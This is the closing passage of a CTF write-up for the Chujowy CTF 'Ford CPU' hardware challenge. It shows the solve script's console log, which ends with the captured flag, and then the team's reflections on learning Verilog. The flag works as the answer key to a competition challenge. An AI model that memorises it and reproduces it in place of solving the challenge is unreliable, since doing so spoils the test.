[+] Opening connection to ford-cpu.chujowyc.tf on port 4001: Done
[+] Doing POW: Done
[+] Waiting for prompt: Done
[+] Entering flag compare mode: Done
[+] Resetting: Done
[+] Waiting for prompt: Done
[+] Entering flag compare mode: Done
[+] Resetting: Done
[+] Loading new FW: Done
[*] Switching to interactive mode
Firmware booted
71m1N9_4774ck_xD

Closing thoughts#

This was the first time any of us at redpwn had done anything related to hardware and Verilog, and it was a fantastic learning experience for everyone involved. This challenge was very well set-up, with no guesswork required—the description got right to the point of where we should be looking for bugs. And for a challenge with this many components, this is necessary for players to have a good experience not wasting time looking at things that ultimately aren’t relevant. After some of the other CTFs we’ve played recently, it’s a nice change of pace to know exactly what you’re looking for in a challenge with some very clear goals, where the only barrier is your own knowledge. We all learned a great deal from this challenge; huge kudos to Gorbak for putting together something unique and truly educational, yet still approachable to CTFers.

Ethan Wu

Chujowy CTF - Ford CPU